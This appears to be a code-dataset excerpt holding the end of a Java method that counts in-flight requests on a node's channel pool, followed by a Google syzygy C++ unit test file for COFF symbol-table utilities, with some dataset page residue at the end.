  /** Current in-flight request count for the node's channel pool (0 if no pool). */
  protected int getInFlight(@NonNull Node node, @NonNull Session session) {
    // The cast will always succeed because there's no way to replace the internal session impl
    ChannelPool pool = ((DefaultSession) session).getPools().get(node);
    // Note: getInFlight() includes orphaned ids, which is what we want as we need to account
    // for requests that were cancelled or timed out (since the node is likely to still be
    // processing them).
    return (pool == null) ? 0 : pool.getInFlight();
  }
}
| 4,563 |
343 | <reponame>nzeh/syzygy
// Copyright 2014 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/pe/coff_utils.h"
#include "base/bind.h"
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#include "syzygy/pe/unittest_util.h"
namespace pe {
namespace {

using block_graph::BlockGraph;
using testing::_;
using testing::Return;

// Known symbol/section names expected to exist in the test COFF image.
static const char kFunction2[] = "?function2@@YAHXZ";  // decorated name, unique symbol
static const char kDebugS[] = ".debug$S";              // section symbol, appears multiple times

// Mock fixture exposing a VisitCoffSymbol callback whose expectations drive the tests.
class LenientCoffUtilsTest : public testing::CoffUnitTest {
 public:
  MOCK_METHOD3(VisitCoffSymbol, bool(BlockGraph::Block*,
                                     BlockGraph::Block*,
                                     BlockGraph::Offset));
};
typedef testing::StrictMock<LenientCoffUtilsTest> CoffUtilsTest;

typedef std::set<std::string> StringSet;

// Visitor callback: resolves each visited symbol's name and accumulates it in |names|.
// Always returns true so the visit continues over all symbols.
bool VisitCoffSymbolAndGrabName(StringSet* names,
                                BlockGraph::Block* symbols_block,
                                BlockGraph::Block* strings_block,
                                BlockGraph::Offset symbol_offset) {
  DCHECK_NE(reinterpret_cast<StringSet*>(NULL), names);
  DCHECK_NE(reinterpret_cast<BlockGraph::Block*>(NULL), symbols_block);
  DCHECK_NE(reinterpret_cast<BlockGraph::Block*>(NULL), strings_block);

  base::StringPiece name;
  EXPECT_TRUE(GetCoffSymbolName(symbols_block, strings_block, symbol_offset,
                                &name));
  EXPECT_FALSE(name.empty());
  names->insert(name.as_string());
  return true;
}

}  // namespace
// FindCoffSpecialBlocks must fail until all three special blocks (headers, symbol
// table, string table) are present, even when only a subset is requested.
TEST_F(CoffUtilsTest, FindCoffSpecialBlocks) {
  BlockGraph::Block* actual_headers_block = NULL;
  BlockGraph::Block* actual_symbols_block = NULL;
  BlockGraph::Block* actual_strings_block = NULL;

  BlockGraph::Block* headers_block =
      block_graph_.AddBlock(
          BlockGraph::DATA_BLOCK,
          sizeof(IMAGE_FILE_HEADER) + 12 * sizeof(IMAGE_SECTION_HEADER),
          "COFF Headers");
  ASSERT_TRUE(headers_block != NULL);
  headers_block->set_attribute(BlockGraph::COFF_HEADERS);

  // FindCoffSpecialBlocks() should fail even if we don't request the other
  // special blocks.
  EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
                                     &actual_headers_block,
                                     &actual_symbols_block,
                                     &actual_strings_block));
  EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
                                     &actual_headers_block, NULL, NULL));

  BlockGraph::Block* symbols_block =
      block_graph_.AddBlock(BlockGraph::DATA_BLOCK,
                            30 * sizeof(IMAGE_SYMBOL),
                            "COFF Symbol Table");
  ASSERT_TRUE(symbols_block != NULL);
  symbols_block->set_attribute(BlockGraph::COFF_SYMBOL_TABLE);

  // Still missing the string table, so lookups must keep failing.
  EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
                                     &actual_headers_block,
                                     &actual_symbols_block,
                                     &actual_strings_block));
  EXPECT_FALSE(FindCoffSpecialBlocks(&block_graph_,
                                     &actual_headers_block,
                                     &actual_symbols_block,
                                     NULL));

  BlockGraph::Block* strings_block =
      block_graph_.AddBlock(BlockGraph::DATA_BLOCK, 242, "COFF String Table");
  ASSERT_TRUE(strings_block != NULL);
  strings_block->set_attribute(BlockGraph::COFF_STRING_TABLE);

  // All three special blocks exist now: the lookup succeeds and returns them.
  EXPECT_TRUE(FindCoffSpecialBlocks(&block_graph_,
                                    &actual_headers_block,
                                    &actual_symbols_block,
                                    &actual_strings_block));
  EXPECT_EQ(headers_block, actual_headers_block);
  EXPECT_EQ(symbols_block, actual_symbols_block);
  EXPECT_EQ(strings_block, actual_strings_block);
}
// VisitCoffSymbols must abort (and fail) when the callback returns false, and
// succeed when the callback accepts every symbol.
TEST_F(CoffUtilsTest, VisitCoffSymbols) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  BlockGraph::Block* symbols_block = NULL;
  BlockGraph::Block* strings_block = NULL;
  ASSERT_TRUE(FindCoffSpecialBlocks(&block_graph_,
                                    NULL,
                                    &symbols_block,
                                    &strings_block));

  VisitCoffSymbolCallback callback = base::Bind(
      &CoffUtilsTest::VisitCoffSymbol, base::Unretained(this));

  // Expect the visitor to fail if the callback does.
  EXPECT_CALL(*this, VisitCoffSymbol(symbols_block,
                                     strings_block,
                                     _)).WillOnce(Return(false));
  EXPECT_FALSE(VisitCoffSymbols(callback, &block_graph_));

  // Now expect the visitor to succeed.
  EXPECT_CALL(*this, VisitCoffSymbol(symbols_block,
                                     strings_block,
                                     _)).
      WillRepeatedly(Return(true));
  EXPECT_TRUE(VisitCoffSymbols(callback, &block_graph_));
}
// Every symbol visited in the decomposed image must resolve to a non-empty name.
TEST_F(CoffUtilsTest, GetCoffSymbolName) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  StringSet names;
  VisitCoffSymbolCallback callback = base::Bind(
      &VisitCoffSymbolAndGrabName, base::Unretained(&names));
  EXPECT_TRUE(VisitCoffSymbols(callback, &block_graph_));
  EXPECT_FALSE(names.empty());
}
// Looking up a symbol that does not exist succeeds but yields no offsets.
TEST_F(CoffUtilsTest, FindCoffSymbolInvalid) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  CoffSymbolOffsets offsets;
  EXPECT_TRUE(FindCoffSymbol("_foo_bar_baz", &block_graph_, &offsets));
  EXPECT_TRUE(offsets.empty());
}
// A section symbol like .debug$S appears once per section, so multiple offsets come back.
TEST_F(CoffUtilsTest, FindCoffSymbolDuplicate) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  CoffSymbolOffsets offsets;
  EXPECT_TRUE(FindCoffSymbol(kDebugS, &block_graph_, &offsets));
  EXPECT_LT(1u, offsets.size());
}
// A uniquely-defined function symbol resolves to exactly one offset.
TEST_F(CoffUtilsTest, FindCoffSymbolUnique) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  CoffSymbolOffsets offsets;
  EXPECT_TRUE(FindCoffSymbol(kFunction2, &block_graph_, &offsets));
  EXPECT_EQ(1u, offsets.size());
}
// The name->offsets map must contain known symbols (unique and duplicated) and
// omit names that don't exist in the image.
TEST_F(CoffUtilsTest, BuildCoffSymbolNameOffsetMap) {
  ASSERT_NO_FATAL_FAILURE(DecomposeOriginal());
  CoffSymbolNameOffsetMap map;
  EXPECT_TRUE(BuildCoffSymbolNameOffsetMap(&block_graph_, &map));
  EXPECT_FALSE(map.empty());

  // Absent symbol: no entry.
  CoffSymbolNameOffsetMap::const_iterator it = map.find("_foo_bar_baz");
  EXPECT_TRUE(it == map.end());

  // Unique symbol: entry with at least one offset.
  it = map.find(kFunction2);
  ASSERT_TRUE(it != map.end());
  EXPECT_FALSE(it->second.empty());

  // Duplicated section symbol: entry with multiple offsets.
  it = map.find(kDebugS);
  ASSERT_TRUE(it != map.end());
  EXPECT_LT(1u, it->second.size());
}
} // namespace pe
| 3,133 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.